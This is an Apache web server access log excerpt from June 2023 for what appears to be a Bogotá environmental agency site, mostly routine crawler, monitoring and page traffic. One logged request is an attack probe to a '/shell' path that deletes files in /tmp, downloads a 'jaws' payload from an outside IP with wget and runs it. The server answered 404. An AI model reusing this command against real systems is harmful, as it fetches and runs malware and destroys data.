45.171.182.184 - - [18/Jun/2023:11:12:01 -0500] "POST /appsia/controlador HTTP/1.1" 200 6634
45.171.182.184 - - [18/Jun/2023:11:12:03 -0500] "POST /appsia/controlador HTTP/1.1" 200 11341
201.245.192.253 - - [18/Jun/2023:11:12:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
200.118.64.109 - - [18/Jun/2023:11:13:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
52.167.144.90 - - [18/Jun/2023:11:14:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/2165.pdf HTTP/1.1" 304 -
173.252.107.1 - - [18/Jun/2023:11:15:04 -0500] "GET /images/aire-bogota.jpeg HTTP/1.1" 200 169194
200.118.64.109 - - [18/Jun/2023:11:15:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:11:14:11 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [18/Jun/2023:11:16:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:11:15:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57680
201.245.192.253 - - [18/Jun/2023:11:17:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
172.22.2.4 - - [18/Jun/2023:11:17:11 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9682
186.80.52.205 - - [18/Jun/2023:11:17:13 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
186.80.52.205 - - [18/Jun/2023:11:17:15 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 497533
200.118.64.109 - - [18/Jun/2023:11:17:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:11:19:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [18/Jun/2023:11:20:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38820
201.245.192.253 - - [18/Jun/2023:11:20:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35700
45.171.182.184 - - [18/Jun/2023:11:20:34 -0500] "POST /appsia/controlador HTTP/1.1" 200 7769
45.171.182.184 - - [18/Jun/2023:11:20:38 -0500] "POST /appsia/controlador HTTP/1.1" 200 5437
45.171.182.184 - - [18/Jun/2023:11:20:40 -0500] "POST /appsia/controlador HTTP/1.1" 200 4799
200.118.64.109 - - [18/Jun/2023:11:21:17 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
200.118.64.109 - - [18/Jun/2023:11:21:17 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:11:21:18 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:11:21:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:11:21:21 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 14
200.118.64.109 - - [18/Jun/2023:11:21:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 4324
200.118.64.109 - - [18/Jun/2023:11:21:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
69.171.231.117 - - [18/Jun/2023:11:21:37 -0500] "GET /images/manos-reparadoras-plaza-americas-1.jpg HTTP/1.1" 200 47593
69.171.231.3 - - [18/Jun/2023:11:21:37 -0500] "GET /images/liberacion-animales-silvestres.jpg HTTP/1.1" 200 57397
216.245.221.92 - - [18/Jun/2023:11:21:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:11:20:01 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.118.64.109 - - [18/Jun/2023:11:21:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [18/Jun/2023:11:21:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
172.22.2.4 - - [18/Jun/2023:11:20:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53643
200.118.64.109 - - [18/Jun/2023:11:23:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:11:24:10 -0500] "GET /BLA/boletinlegal/normativa.php HTTP/1.1" 200 8343
200.118.64.109 - - [18/Jun/2023:11:25:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
173.252.111.116 - - [18/Jun/2023:11:26:27 -0500] "GET /fima-2023-secretaria-de-ambiente-presento-red-de-monitoreo-de-fauna-y-de-prediccion-climatica.html HTTP/1.1" 200 779
216.245.221.92 - - [18/Jun/2023:11:26:41 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [18/Jun/2023:11:25:03 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
201.245.192.253 - - [18/Jun/2023:11:26:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
172.22.2.4 - - [18/Jun/2023:11:25:51 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.118.64.109 - - [18/Jun/2023:11:27:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
222.136.99.20 - - [18/Jun/2023:11:27:55 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
172.22.2.4 - - [18/Jun/2023:11:26:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
200.118.64.109 - - [18/Jun/2023:11:29:44 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [18/Jun/2023:11:30:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38820
201.245.192.253 - - [18/Jun/2023:11:30:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35700
173.252.111.7 - - [18/Jun/2023:11:30:48 -0500] "GET /images/aire-bogota.jpeg HTTP/1.1" 200 169194
168.119.253.61 - - [18/Jun/2023:11:31:24 -0500] "GET / HTTP/1.1" 200 319
168.119.253.61 - - [18/Jun/2023:11:31:26 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [18/Jun/2023:11:31:41 -0500] "HEAD / HTTP/1.1" 200 -
200.118.64.109 - - [18/Jun/2023:11:31:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
52.167.144.90 - - [18/Jun/2023:11:31:59 -0500] "GET /BLA/resoluciones/AUTOS%202022/1894.pdf HTTP/1.1" 200 371376
201.245.192.253 - - [18/Jun/2023:11:31:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
172.22.2.4 - - [18/Jun/2023:11:33:12 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2014%20del%2011%20de%20Septiembre%20de%202012.pdf HTTP/1.1" 304 -
172.22.2.4 - - [18/Jun/2023:11:31:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
200.118.64.109 - - [18/Jun/2023:11:33:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [18/Jun/2023:11:32:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57272
66.249.70.197 - - [18/Jun/2023:11:35:01 -0500] "-" 408 -
173.252.79.119 - - [18/Jun/2023:11:35:07 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
200.118.64.109 - - [18/Jun/2023:11:35:45 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69a1472e6bb6849ea9a2cb21c4a090039.e3iSbxaKaheRe3mNc3qRchuOay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
162.55.175.158 - - [18/Jun/2023:11:36:06 -0500] "GET / HTTP/1.1" 200 319
162.55.175.158 - - [18/Jun/2023:11:36:06 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [18/Jun/2023:11:36:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [18/Jun/2023:11:36:56 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 40957
172.22.2.4 - - [18/Jun/2023:11:37:03 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [18/Jun/2023:11:37:04 -0500] "GET /BLA/boletinlegal/Directivas/2016/Directiva%20No.%2001%20del%2012%20de%20Abril%20de%202016.pdf HTTP/1.1" 200 868354
